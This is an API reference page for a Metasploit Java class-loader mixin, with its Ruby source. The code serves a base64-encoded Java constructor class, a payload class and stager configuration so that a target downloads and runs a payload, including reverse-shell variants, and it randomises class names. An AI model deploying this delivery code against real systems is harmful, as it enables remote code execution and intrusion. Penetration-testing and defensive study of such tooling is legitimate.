Module: Msf::Exploit::Remote::Java::HTTP::ClassLoader
- Includes:
- HttpServer
- Defined in:
- lib/msf/core/exploit/remote/java/http/class_loader.rb
Instance Attribute Summary
Attributes included from SocketServer
Instance Method Summary collapse
- #class_name ⇒ Object
-
#constructor_class ⇒ Object
import metasploit.Payload;.
- #initialize(info = {}) ⇒ Object
- #on_request_uri(cli, request) ⇒ Object
- #packed_class_name ⇒ Object
- #resource_uri ⇒ Object
- #start_service(opts = {}) ⇒ Object
Methods included from HttpServer
#add_resource, #add_robots_resource, #autofilter, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #use_zlib
Methods included from Auxiliary::Report
#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot
Methods included from Metasploit::Framework::Require
optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines
Methods included from TcpServer
#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression, #ssl_version
Methods included from SocketServer
#_determine_server_comm, #bindhost, #bindport, #cleanup, #cleanup_service, #exploit, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #via_string
Instance Method Details
#class_name ⇒ Object
124 125 126 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 124 def class_name @class_name ||= rand_text_alpha(8..42).capitalize end |
#constructor_class ⇒ Object
import metasploit.Payload;
public class Metasploit {
public Metasploit() {
try {
Payload.main(null);
}
catch (Exception e) {}
}
}
108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 108 def constructor_class klass = Rex::Text.decode_base64( <<~EOF yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAN U3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNqYXZhL2xhbmcvRXhjZXB0aW9u AQAKTWV0YXNwbG9pdAEAEGphdmEvbGFuZy9PYmplY3QBABJtZXRhc3Bsb2l0L1BheWxvYWQB AARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgA AAA3AAEAAgAAAA0qtwABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgAB BwALAAAA EOF ) # Replace length-prefixed string "Metasploit" with a random one klass.sub("\x00\x0aMetasploit", packed_class_name) end |
#initialize(info = {}) ⇒ Object
12 13 14 15 16 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 12 def initialize(info = {}) super(update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive )) end |
#on_request_uri(cli, request) ⇒ Object
37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 37 def on_request_uri(cli, request) vprint_status("#{request.method} #{request.uri} requested") unless %w[HEAD GET].include?(request.method) vprint_error("Ignoring #{request.method} request") return end resource = request.raw_uri.delete_prefix(resource_uri) if request.method == 'HEAD' whitelist = %W[ #{class_name}.class metasploit/Payload.class metasploit.dat ] unless whitelist.include?(resource) vprint_error('Sending 404') return send_not_found(cli) end vprint_good('Sending 200') return send_response(cli, '') end case resource # Stage 1 when "#{class_name}.class" vprint_good('Sending the constructor class') # This contains the constructor that will call our JavaPayload res = constructor_class # Stage 2 when 'metasploit/Payload.class' vprint_good('Sending the main payload class') # This is our JavaPayload as a compiled class res = MetasploitPayloads.read('java/metasploit/Payload.class') # Stage 3 when 'metasploit.dat' vprint_good('Sending the payload configuration data') # This tells the target how to address the payload; this is the magic! res = payload_instance.stager_config # (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp when /^javapayload\/stage\/(?:Shell|Stage|StreamForwarder)\.class$/ vprint_good("Sending additional payload class: #{resource}") res = MetasploitPayloads.read("java/#{resource}") else vprint_error('Sending 404') return send_not_found(cli) end send_response( cli, res, # file -I says application/x-java-applet, but I don't believe it 'Content-Type' => 'application/octet-stream' ) end |
#packed_class_name ⇒ Object
128 129 130 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 128 def packed_class_name "#{[class_name.length].pack('n')}#{class_name}" end |
#resource_uri ⇒ Object
29 30 31 32 33 34 35 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 29 def resource_uri return @resource_uri if @resource_uri # the resource URI must end in / for the class loading to work path = super path += '/' unless path.end_with?('/') @resource_uri = path end |
#start_service(opts = {}) ⇒ Object
18 19 20 21 22 23 24 25 26 27 |
# File 'lib/msf/core/exploit/remote/java/http/class_loader.rb', line 18 def start_service(opts = {}) # XXX: This is a workaround until we can take SSL in opts ssl = datastore['SSL'] datastore['SSL'] = false super datastore['SSL'] = ssl get_uri end |